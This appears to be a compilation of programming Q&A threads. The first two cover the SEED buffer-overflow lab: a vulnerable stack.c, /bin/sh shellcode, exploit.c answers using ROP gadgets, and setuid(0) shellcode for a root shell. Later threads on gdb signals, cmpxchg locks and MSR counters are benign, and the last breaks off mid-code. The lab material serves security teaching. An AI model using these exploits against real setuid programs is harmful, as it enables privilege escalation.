Buffer Overflow, modified Seedlab question? - c

In this Lab, I have exploit.c, stack.c and call_shellcode.c. Stack.c has been modifed so it prints out the buffer address and ebp address. I am running this on Virtual Machine, ubuntu 12.04 32 bit.
I have to use the vulnerable program stack.c and put code in exploit.c in order to create a shell when running my stack executable. Any help is appreciated.
Stack.c is down below Sorry for bad indentation, actual code has proper indentation.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
unsigned long int sp;
int cp(char *str)
{
// unsigned long int sp;
char buffer[12];
asm("movl %%ebp, %0" : "=r" (sp));
printf("$ebp is 0X%lx\n",sp);
strcpy(buffer, str);
printf("Buffer is at address %p\n",(void*)(&buffer));
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
cp(str);
printf("Returned Properly\n");
return 1;
}
And exploit.c is down below.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
I have ran gdb on my stack executable, compiled with gcc -o stack -z execstack -fno-stack-protector stack.c, and have found the buffer to be at address 0xbffff134 and ebp at 0xbffff148. I understand I have to somehow find my return address and make my payload be at that addresss? Some help regarding bufferoverflow with this assignment is needed please.

You need bypass ASLR, refer to the link below
https://sploitfun.wordpress.com/2015/05/08/bypassing-aslr-part-iii/
Find gadget:
pop ebx; ret; // construct ebx value
add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; // construct eax value
add dword [ebx+0x0804A028], esp; call dword [0x08049F1C+eax*4]
construct eax and ebx value
write the ESP value to the 0804a020 memory, then execute it
Modified exploit.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
int main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
int i;
unsigned int *val = (unsigned int*)buffer;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
val[6] = 0x08048378; /* pop ebx; ret; */
val[7] = 0xaaa9a03c; /* ebx */
for(i=8; i<16; i++)
val[i] = 0x0804847c; /* add al, 0x08; add dword [ebx+0x5D5B04C4], eax; ret; */
val[16] = 0x08048378; /* pop ebx; ret; */
val[17] = 0xfffffff8; /* ebx */
val[18] = 0x08048462; /* add dword [ebx+0x0804A028], esp; */
/* call dword [0x08049F1C+eax*4] */
memcpy(&val[19], shellcode, sizeof(shellcode));
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
return 0;
}

Related

Can't Get Root Shell on Buffer Overflow Assignment

I am working an assignment (see http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/) and, when I run ./stack I end up with Trace/breakpoint trap instead of the root shell. The following is my code for exploit.c (which creates badfile) and stack.c (which reads badfile in and uses strcpy to copy it into a buffer that isn't big enough to handle it.
exploit.c
/* exploit.c */
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
memset(buffer + 39, 0xbf, 1);
memset(buffer + 38, 0xff, 1);
memset(buffer + 37, 0xf1, 1);
memset(buffer + 36, 0x40, 1);
strcpy(buffer + 492, shellcode);
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
stack.c
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[24];
/* The following statement has a buffer overflow problem */
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
I compiled stack.c and set permissions as root with
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c
root:/home/seed# chown root stack
root:/home/seed# chmod 4755 stack
I compiled exploit.c as myself (seed) with
seed:~$ gcc -g -o exploit exploit.c
I run ./exploit to create badfile, and get no errors. I run ./stack and get Trace/breakpoint trap.
If I run gdb stack I get the shell, but it is not the root shell.
gdb-peda$ run
Starting program: /home/seed/stack
process 24232 is executing new program: /bin/dash
$
If I run seed:~$ ./stack -D_FORTIFY_SOURCE=0 I get the shell, but once again it isn't root.
seed:~$ ./stack -D_FORTIFY_SOURCE=0
$ id
uid=1000(seed) gid=1000(seed)
$
So, what do I need to change to get a root shell?
I guess, you can add setuid() and setgid() syscall in your shellcode.
char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" // setgid(0);
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
Of course, change owner to root

debugging with timer/signal always ends up in <timer_settime+16>

I am using gdb to debug a code that starts a timer. When the timer rings in gdb I always end up at instruction timer_settime+16.
Is this expected behavior?
As an example I slightly modified the code of timer_settime man page. The idea is to pass two arguments: a string of integers and a nsec value. The code launches the timer to ring after nsec, then copies the string.
I expected that by incrementing the nsec value, gdb stopped at different code lines, to end up inside the copy loop. However it always stops at .
So is this expected behavior?
Is it documented somewhere?
Is there a way to achieve what I expected (i.e.: launch a timer that when ring makes gdb stops where the program was just before (or after) the signal)? (always with nsec granularity).
Code:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>
#include <time.h>
#define CLOCKID CLOCK_REALTIME
#define SIG SIGUSR1
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
unsigned char OUT[32];
unsigned char IN[32];
unsigned char ascii2hex(char in){
unsigned char out;
if( ('0' <= in) && (in <= '9') )
out = in - '0';
if( ('A' <= in) && (in <= 'F') )
out = in - 'A' + 10;
if( ('a' <= in) && (in <= 'f') )
out = in - 'a' + 10;
return out;
}
void asciiStr2hex(char * in, unsigned char * out, unsigned int len){
int i = 0;
int j = 0;
for( i = 0; i < len; i+=2){
out[j++] = (ascii2hex(in[i ]) << 4) + ascii2hex(in[i+1]);
}
}
void testcode(unsigned char *out, unsigned char *in, unsigned int len){
unsigned int i;
for (i=0;i<len;i++)
out[i] = in[i];
}
static void print_siginfo(siginfo_t *si)
{
timer_t *tidp;
int or;
tidp = si->si_value.sival_ptr;
printf(" sival_ptr = %p; ", si->si_value.sival_ptr);
printf(" *sival_ptr = 0x%lx\n", (long) *tidp);
or = timer_getoverrun(*tidp);
if (or == -1)
errExit("timer_getoverrun");
else
printf(" overrun count = %d\n", or);
}
static void handler(int sig, siginfo_t *si, void *uc)
{
/* Note: calling printf() from a signal handler is not
strictly correct, since printf() is not async-signal-safe;
see signal(7) */
printf("Caught signal %d\n", sig);
print_siginfo(si);
signal(sig, SIG_IGN);
}
int main(int argc, char *argv[])
{
timer_t timerid;
struct sigevent sev;
struct itimerspec its;
long long freq_nanosecs;
//sigset_t mask;
struct sigaction sa;
if (argc != 3) {
fprintf(stderr, "Usage: %s <16byte> <time-nanosecs>\n",
argv[0]);
exit(EXIT_FAILURE);
}
asciiStr2hex(argv[1], IN, 32);
/* Establish handler for timer signal */
printf("Establishing handler for signal %d\n", SIG);
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = handler;
sigemptyset(&sa.sa_mask);
if (sigaction(SIG, &sa, NULL) == -1)
errExit("sigaction");
/* Block timer signal temporarily */
/* printf("Blocking signal %d\n", SIG);
sigemptyset(&mask);
sigaddset(&mask, SIG);
if (sigprocmask(SIG_SETMASK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
/* Create the timer */
sev.sigev_notify = SIGEV_SIGNAL;
sev.sigev_signo = SIG;
sev.sigev_value.sival_ptr = &timerid;
if (timer_create(CLOCKID, &sev, &timerid) == -1)
errExit("timer_create");
printf("timer ID is 0x%lx\n", (long) timerid);
/* Start the timer */
freq_nanosecs = atoll(argv[2]);
its.it_value.tv_sec = freq_nanosecs / 1000000000;
its.it_value.tv_nsec = freq_nanosecs % 1000000000;
its.it_interval.tv_sec = its.it_value.tv_sec;
its.it_interval.tv_nsec = its.it_value.tv_nsec;
if (timer_settime(timerid, 0, &its, NULL) == -1)
errExit("timer_settime");
/* Sleep for a while; meanwhile, the timer may expire
multiple times */
printf("Sleeping for %d seconds\n", atoi(argv[1]));
testcode(OUT, IN, 16);
/* Unlock the timer signal, so that timer notification
can be delivered */
/* printf("Unblocking signal %d\n", SIG);
if (sigprocmask(SIG_UNBLOCK, &mask, NULL) == -1)
errExit("sigprocmask");
*/
exit(EXIT_SUCCESS);
}
When debug into gdb with r 00112233445566778899001122334455 2
I obtain:
Program received signal SIGUSR1, User defined signal 1.
0x76fc7c38 in timer_settime () from /lib/arm-linux-gnueabihf/librt.so.1
(gdb) x/30i $pc
=> 0x76fc7c38 <timer_settime+16>: cmn r0, #4096 ; 0x1000
0x76fc7c3c <timer_settime+20>: mov r4, r0
0x76fc7c40 <timer_settime+24>: bhi 0x76fc7c4c <timer_settime+36>
0x76fc7c44 <timer_settime+28>: mov r0, r4
0x76fc7c48 <timer_settime+32>: pop {r3, r4, r7, pc}
0x76fc7c4c <timer_settime+36>: bl 0x76fc55b4
0x76fc7c50 <timer_settime+40>: rsb r3, r4, #0
0x76fc7c54 <timer_settime+44>: mvn r4, #0
0x76fc7c58 <timer_settime+48>: str r3, [r0]
0x76fc7c5c <timer_settime+52>: b 0x76fc7c44 <timer_settime+28>
0x76fc7c60 <timer_settime+56>: andeq r0, r0, r2, lsl #2
0x76fc7c64: push {r4, r5, r6, r7, r8, r9, r10, lr}
0x76fc7c68: sub sp, sp, #600 ; 0x258
0x76fc7c6c: ldr r4, [pc, #340] ; 0x76fc7dc8
0x76fc7c70: add r1, sp, #512 ; 0x200
0x76fc7c74: add r4, pc, r4
0x76fc7c78: mov r0, r4
0x76fc7c7c: bl 0x76fc56b0
0x76fc7c80: cmp r0, #0
0x76fc7c84: bne 0x76fc7c98
0x76fc7c88: ldr r2, [sp, #512] ; 0x200
0x76fc7c8c: ldr r3, [pc, #312] ; 0x76fc7dcc
0x76fc7c90: cmp r2, r3
0x76fc7c94: beq 0x76fc7d94
0x76fc7c98: ldr r5, [pc, #304] ; 0x76fc7dd0
0x76fc7c9c: ldr r0, [pc, #304] ; 0x76fc7dd4
0x76fc7ca0: add r5, pc, r5
0x76fc7ca4: add r0, pc, r0
0x76fc7ca8: mov r1, r5
0x76fc7cac: bl 0x76fc5524
I am running such code on a raspberry pi, but I'am pretty sure I had the same behavior on another linux machine x86_64.
I have tested with "handle stop SIGUSR1".
I finally found that the problem was that I have to set unwindonsignal off in gdb to obtain the behavior I expected.

gcc built-in synchronization functions and cmpxchg

I've trying to implement a lock writing the asm code manually and since the code actually hasn't worked, I used __sync_bool_compare_and_swap to look at the disassembly.
However, the built-in function seems not to work too.
I'm using Ubuntu 15.10 x64
Here's the general structure of the program.
Global:
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <time.h>
#include <stdbool.h>
#include <unistd.h>
unsigned int randrange(unsigned int min, unsigned int max); // custom rand function
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER; // real mutex
__volatile__ unsigned int lock = 1; // my attempt
unsigned int i = 0, count = 0;
Thread function:
void *worker(void *arg)
{
unsigned int loop = randrange(1000, 10000), time = randrange(10, 100);
pthread_mutex_lock(&mutex);
count += loop; // safe keep trace of number of iterations
pthread_mutex_unlock(&mutex);
/* Acquire the custom lock */
for(int x = 0; x < loop; x++)
{
i++; // increment i by number of iterations with a step=1
usleep(time); // short nap
}
__sync_synchronize(); // built-in full barriers
lock = 1; // release the custom lock
pthread_exit((void*) true);
}
Main:
int main()
{
pthread_t thread_id[1000];
pthread_attr_t attr;
unsigned int ret_thread = NULL;
void *status = NULL;
unsigned int args = NULL;
unsigned int nthreads = 1000;
pthread_attr_init(&attr);
pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE);
for(int i = 0; i < nthreads; i++)
{
ret_thread = pthread_create(&thread_id[i], &attr, worker,
(void *) &args);
if(ret_thread)
{
printf("Error occurred during thread creation. \
n: %i - return code: %i", i, ret_thread);
return -1;
}
}
pthread_attr_destroy(&attr);
for(int i = 0; i < nthreads; i++)
{
ret_thread = pthread_join(thread_id[i], &status);
if(ret_thread)
{
printf("Error occurred during thread joining. \
n: %i - return code: %i", i, ret_thread);
return -1;
}
}
puts("\nmain: All the threads exited normally.\n");
printf("count: %i - i: %i\n", count, i); // core: compare the safe trace or number of iterations with the target one
puts("\n\nmain: I've finished, bye.\n");
pthread_mutex_destroy(&mutex);
return 0;
}
Since cmpxchg source, destination compares the accumulator (register A) with the destination operand, so that
if accumulator == destination then ZF is set and the source is copied into the destination and
if accumulator != destination then ZF is reset and the destination is copied into the accumulator...
My attempt:
void *worker(void *arg)
{
unsigned int loop = randrange(1000, 10000), time = randrange(10, 100);
pthread_mutex_lock(&mutex);
count += loop; // safe keep trace of number of iterations
pthread_mutex_unlock(&mutex);
/* My attempt */
prepare:
__asm__ __volatile__ ("xor %r8, %r8");
wait:
__asm__ __volatile__ ("nop \n\t"
"mov $0x1, %rax \n\t"
"lock; cmpxchgq %r8, (lock)");
__asm__ __volatile__ goto ("jne %l0" :::: wait);
/* My attempt */
for(int x = 0; x < loop; x++)
{
i++; // increment i by number of iterations with a step=1
usleep(time); // short nap
}
__sync_synchronize(); // built-in full barriers
lock = 1; // release the custom lock
pthread_exit((void*) true);
}
Disassembly:
(gdb) disas worker
Dump of assembler code for function worker:
0x0000000000400c70 <+0>: push %r12
0x0000000000400c72 <+2>: push %rbp
0x0000000000400c73 <+3>: mov $0x2710,%esi
0x0000000000400c78 <+8>: push %rbx
0x0000000000400c79 <+9>: mov $0x3e8,%edi
0x0000000000400c7e <+14>: callq 0x400c20 <randrange>
0x0000000000400c83 <+19>: mov $0x32,%esi
0x0000000000400c88 <+24>: mov $0x1,%edi
0x0000000000400c8d <+29>: mov %eax,%ebp
0x0000000000400c8f <+31>: callq 0x400c20 <randrange>
0x0000000000400c94 <+36>: mov $0x602100,%edi
0x0000000000400c99 <+41>: mov %eax,%r12d
0x0000000000400c9c <+44>: callq 0x4009d0 <pthread_mutex_lock#plt>
0x0000000000400ca1 <+49>: mov $0x602100,%edi
0x0000000000400ca6 <+54>: add %ebp,0x201434(%rip) # 0x6020e0 <count>
0x0000000000400cac <+60>: callq 0x400980 <pthread_mutex_unlock#plt>
0x0000000000400cb1 <+65>: nopl 0x0(%rax)
0x0000000000400cb8 <+72>: nop
0x0000000000400cb9 <+73>: xor %r8,%r8
0x0000000000400cbc <+76>: mov $0x1,%rax
0x0000000000400cc3 <+83>: lock cmpxchg %r8,0x6020b8 # 0x6020b8 <lock>
0x0000000000400ccd <+93>: jne 0x400cb8 <worker+72>
0x0000000000400ccf <+95>: xor %ebx,%ebx
0x0000000000400cd1 <+97>: test %ebp,%ebp
0x0000000000400cd3 <+99>: je 0x400cee <worker+126>
0x0000000000400cd5 <+101>: nopl (%rax)
0x0000000000400cd8 <+104>: mov %r12d,%edi
0x0000000000400cdb <+107>: add $0x1,%ebx
0x0000000000400cde <+110>: addl $0x1,0x2013ff(%rip) # 0x6020e4 <i>
0x0000000000400ce5 <+117>: callq 0x4009f0 <usleep#plt>
0x0000000000400cea <+122>: cmp %ebp,%ebx
0x0000000000400cec <+124>: jne 0x400cd8 <worker+104>
0x0000000000400cee <+126>: mov $0x1,%edi
0x0000000000400cf3 <+131>: mfence
0x0000000000400cf6 <+134>: movl $0x1,0x2013b8(%rip) # 0x6020b8 <lock>
0x0000000000400d00 <+144>: callq 0x400990 <pthread_exit#plt>
End of assembler dump.
With __sync_bool_compare_and_swap():
void *worker(void *arg)
{
unsigned int loop = randrange(1000, 10000), time = randrange(10, 100);
pthread_mutex_lock(&mutex);
count += loop; // safe keep trace of number of iterations
pthread_mutex_unlock(&mutex);
/* built-in function */
while(!__sync_bool_compare_and_swap(&lock, 1, 0))
{
while(lock) __asm__ __volatile__ ("nop");
}
/* built-in function */
for(int x = 0; x < loop; x++)
{
i++; // increment i by number of iterations with a step=1
usleep(time); // short nap
}
__sync_synchronize(); // built-in full barriers
lock = 1; // release the custom lock
pthread_exit((void*) true);
}
Disassembly:
(gdb) disas worker
Dump of assembler code for function worker:
0x0000000000400c70 <+0>: push %r12
0x0000000000400c72 <+2>: push %rbp
0x0000000000400c73 <+3>: mov $0x2710,%esi
0x0000000000400c78 <+8>: push %rbx
0x0000000000400c79 <+9>: mov $0x3e8,%edi
0x0000000000400c7e <+14>: callq 0x400c20 <randrange>
0x0000000000400c83 <+19>: mov $0x32,%esi
0x0000000000400c88 <+24>: mov $0x1,%edi
0x0000000000400c8d <+29>: mov %eax,%ebx
0x0000000000400c8f <+31>: callq 0x400c20 <randrange>
0x0000000000400c94 <+36>: mov $0x602100,%edi
0x0000000000400c99 <+41>: mov %eax,%ebp
0x0000000000400c9b <+43>: callq 0x4009d0 <pthread_mutex_lock#plt>
0x0000000000400ca0 <+48>: mov $0x602100,%edi
0x0000000000400ca5 <+53>: add %ebx,0x201435(%rip) # 0x6020e0 <count>
0x0000000000400cab <+59>: callq 0x400980 <pthread_mutex_unlock#plt>
0x0000000000400cb0 <+64>: mov $0x1,%ecx
0x0000000000400cb5 <+69>: xor %edx,%edx
0x0000000000400cb7 <+71>: nopw 0x0(%rax,%rax,1)
0x0000000000400cc0 <+80>: mov %ecx,%eax
0x0000000000400cc2 <+82>: lock cmpxchg %edx,0x2013ee(%rip) # 0x6020b8 <lock>
0x0000000000400cca <+90>: je 0x400cdd <worker+109>
0x0000000000400ccc <+92>: nopl 0x0(%rax)
0x0000000000400cd0 <+96>: mov 0x2013e2(%rip),%eax # 0x6020b8 <lock>
0x0000000000400cd6 <+102>: test %eax,%eax
0x0000000000400cd8 <+104>: je 0x400cc0 <worker+80>
0x0000000000400cda <+106>: nop
0x0000000000400cdb <+107>: jmp 0x400cd0 <worker+96>
0x0000000000400cdd <+109>: xor %r12d,%r12d
0x0000000000400ce0 <+112>: test %ebx,%ebx
0x0000000000400ce2 <+114>: je 0x400cfb <worker+139>
0x0000000000400ce4 <+116>: mov %ebp,%edi
0x0000000000400ce6 <+118>: add $0x1,%r12d
0x0000000000400cea <+122>: addl $0x1,0x2013f3(%rip) # 0x6020e4 <i>
0x0000000000400cf1 <+129>: callq 0x4009f0 <usleep#plt>
0x0000000000400cf6 <+134>: cmp %ebx,%r12d
0x0000000000400cf9 <+137>: jne 0x400ce4 <worker+116>
0x0000000000400cfb <+139>: mov $0x1,%edi
0x0000000000400d00 <+144>: mfence
0x0000000000400d03 <+147>: movl $0x1,0x2013ab(%rip) # 0x6020b8 <lock>
0x0000000000400d0d <+157>: callq 0x400990 <pthread_exit#plt>
End of assembler dump.
The built-in function produce more code:
0x0000000000400cb0 <+64>: mov $0x1,%ecx
0x0000000000400cb5 <+69>: xor %edx,%edx
0x0000000000400cb7 <+71>: nopw 0x0(%rax,%rax,1)
0x0000000000400cc0 <+80>: mov %ecx,%eax
0x0000000000400cc2 <+82>: lock cmpxchg %edx,0x2013ee(%rip) # 0x6020b8 <lock>
0x0000000000400cca <+90>: je 0x400cdd <worker+109>
0x0000000000400ccc <+92>: nopl 0x0(%rax)
0x0000000000400cd0 <+96>: mov 0x2013e2(%rip),%eax # 0x6020b8 <lock>
0x0000000000400cd6 <+102>: test %eax,%eax
0x0000000000400cd8 <+104>: je 0x400cc0 <worker+80>
0x0000000000400cda <+106>: nop
0x0000000000400cdb <+107>: jmp 0x400cd0 <worker+96>
What does the code between line 96 and 107 do?
I don't think the built-in function produce useless code, so I'd want to understand what I though in the wrong way.
The built-in function it works sometimes which means that it doesn't work at all!
UPDATE:
I've retested the implementation with the builtin and it works.
How should I procede?

Creating buffer overflow in C (seg fault)

Since our security course doesn't have a lab, i'm trying to solve the Seed project's lab .
http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/Buffer_Overflow.pdf
But there seems to be a problem , The code is not doing the exploit instead it's giving segmentation fault error . Is there something else must be added to the code in order to make it functional ?
The lab says that i have to edit the code below
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdq */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

Linux module: performance counter does not work

I want to monitor the cache request number in the last level cache. I wrote a Linux module to get that information based on the tutorial here.
It can compile and run, but the output result is always 0. In other words, when I use rdmsr, it always give me edx=0, eax=0. I even tried the demo code in the tutorial, the output is still 0.
I'm stuck at this problem for a whole week. Could anyone help me point out the mistake I made in the program?
I knew there are some existing programs doing the same thing, but I have to know how to write the code by myself, because I want to monitor the cache request in Xen hypervisor. I cannot use those tools in Xen unless I incorporate the tools into Xen's hypervisor, which seems more work.
/*
* Record the cache miss rate of Intel Sandybridge cpu
* To confirm the event is correctly set!
*/
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
/*4 Performance Counters Selector for %ecx in insn wrmsr*/
#define PERFEVTSEL0 0x186
#define PERFEVTSEL1 0x187
#define PERFEVTSEL2 0x188
#define PERFEVTSEL3 0x189
/*4 MSR Performance Counter for the above selector*/
#define PMC0 0xc1
#define PMC1 0xc2
#define PMC2 0xc2
#define PMC3 0xc3
/*Intel Software Developer Manual Page 2549*/ /*L1I L1D cache events has not been confirmed!*/
/*L1 Instruction Cache Performance Tuning Events*/
#define L1I_ALLHIT_EVENT 0x80
#define L1I_ALLHIT_MASK 0x01
#define L1I_ALLMISS_EVENT 0x80 /*confirmed*/
#define L1I_ALLMISS_MASK 0x02 /*confirmed*/
/*L1 Data Cache Performance Tuning Events*/
/*Intel does not have the ALLREQ Miss mask; have to add LD_miss and ST_miss*/
#define L1D_ALLREQ_EVENT 0x43
#define L1D_ALLREQ_MASK 0x01
#define L1D_LDMISS_EVENT 0x40
#define L1D_LDMISS_MASK 0x01
#define L1D_STMISS_EVENT 0x28
#define L1D_STMISS_MASK 0x01
/*L2 private cache for each core*/ /*confirmed*/
#define L2_ALLREQ_EVENT 0x24
#define L2_ALLREQ_MASK L2_ALLCODEREQ_MASK /*0xFF*/
#define L2_ALLMISS_EVENT 0x24
#define L2_ALLMISS_MASK L2_ALLCODEMISS_MASK /*0xAA*/
#define L2_ALLCODEREQ_MASK 0x30
#define L2_ALLCODEMISS_MASK 0x20
/*L3 shared cache*/ /*confirmed*/
/*Use the last level cache event and mask*/
#define L3_ALLREQ_EVENT 0x2E
#define L3_ALLREQ_MASK 0x4F
#define L3_ALLMISS_EVENT 0x2E
#define L3_ALLMISS_MASK 0x41
#define USR_BIT (0x01UL << 16)
#define OS_BIT (0x01UL << 17)
#define SET_MSR_USR_BIT(eax) eax |= USR_BIT
#define CLEAR_MSR_USR_BIT(exa) eax &= (~USR_BIT)
#define SET_MSR_OS_BIT(eax) eax |= OS_BIT
#define CLEAR_MSR_OS_BIT(eax) eax &= (~OS_BIT)
#define SET_EVENT_MASK(eax, event, umask) eax |= (event | (umask << 8))
/*MSR EN flag: when set start the counter!*/
//#define MSR_ENFLAG (0x1<<22)
#define MSR_ENFLAG (0x1<<22)
/* 32bit insn v3*/
static inline void rtxen_write_msr(uint32_t eax, uint32_t ecx)
{
/*clear counter first*/
__asm__ __volatile__ ("movl %0, %%ecx\n\t"
"xorl %%edx, %%edx\n\t"
"xorl %%eax, %%eax\n\t"
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx)
: "eax", "ecx", "edx" /* all clobbered */);
eax |= MSR_ENFLAG;
__asm__("movl %0, %%ecx\n\t" /* ecx contains the number of the MSR to set */
"xorl %%edx, %%edx\n\t"/* edx contains the high bits to set the MSR to */
"movl %1, %%eax\n\t" /* eax contains the log bits to set the MSR to */
"wrmsr\n\t"
: /* no outputs */
: "m" (ecx), "m" (eax)
: "eax", "ecx", "edx" /* clobbered */);
}
static inline void rtxen_read_msr(uint32_t* ecx, uint32_t *eax, uint32_t* edx)
{ __asm__ __volatile__(\
"rdmsr"\
:"=d" (*edx), "=a" (*eax)\
:"c"(*ecx)
);
}
static inline void delay(void )
{
char tmp[1000];
int i;
for( i = 0; i < 1000; i++ )
{
tmp[i] = i * 2;
}
}
enum cache_level
{
UOPS,
L1I,
L1D,
L2,
L3
};
int init_module(void)
{
enum cache_level op;
uint32_t eax, edx, ecx;
uint64_t l3_all;
op = UOPS;
switch(op)
{
case UOPS:
eax = 0x0001010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
ecx = 0xc2;
eax = 1;
edx = 2;
rtxen_read_msr(&ecx, &eax, &edx);
printk(KERN_INFO "UOPS Demo: read_msr: edx=%#010x, eax=%#010x\n", edx, eax);
break;
case L3:
eax = 0;
SET_MSR_USR_BIT(eax);
SET_MSR_OS_BIT(eax);
SET_EVENT_MASK(eax, L3_ALLREQ_EVENT, L3_ALLREQ_MASK);
eax |= MSR_ENFLAG;
ecx = PERFEVTSEL2;
printk(KERN_INFO "before wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
printk(KERN_INFO "after wrmsr: eax=%#010x, ecx=%#010x\n", eax, ecx);
printk(KERN_INFO "L3 all request set MSR PMC2\n");
printk(KERN_INFO "delay by access an array\n");
delay();
ecx = PMC2;
eax = 1;
edx = 2;
printk(KERN_INFO "rdmsr: ecx=%#010x\n", ecx);
rtxen_read_msr(&ecx, &eax, &edx); /*need to pass into address!*/
l3_all = ( ((uint64_t) edx << 32) | eax );
printk(KERN_INFO "rdmsr: L3 all request is %llu (%#010lx)\n", l3_all, (unsigned long)l3_all);
break;
default:
printk(KERN_INFO "operation not implemented yet\n");
}
/*
* A non 0 return means init_module failed; module can't be loaded.
*/
return 0;
}
void cleanup_module(void)
{
printk(KERN_INFO "Goodbye world 1.\n");
}
The result I have is:
[ 1780.946584] UOPS Demo: write_msr: eax=0x0001010e, ecx=0x00000187
[ 1780.946590] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
[ 1818.595055] Goodbye world 1.
[ 1821.153947] UOPS Demo: write_msr: eax=0x0041010e, ecx=0x00000187
[ 1821.153950] UOPS Demo: read_msr: edx=0x00000000, eax=0x00000000
I finally solve it with the help of #Manuel Selva!
The correct flow of setting a perf. counter is:
Step 1: set msr and enable the counter by setting the EN bit in eax;
Step 2: stop the counter by writing to msr
Step 3: read the counter
I missed the step 2, that's why it always gives me 0. It makes sense to report 0 if I want to read the counter before stopping it.
The correct code of the switch statement is as follows:
switch(op)
{
case UOPS:
eax = 0x0051010E;
eax |= MSR_ENFLAG;
ecx = 0x187;
printk(KERN_INFO "UOPS Demo: write_msr: eax=%#010x, ecx=%#010x\n", eax, ecx);
rtxen_write_msr(eax, ecx);
//stop counting
eax = 0x0011010E;
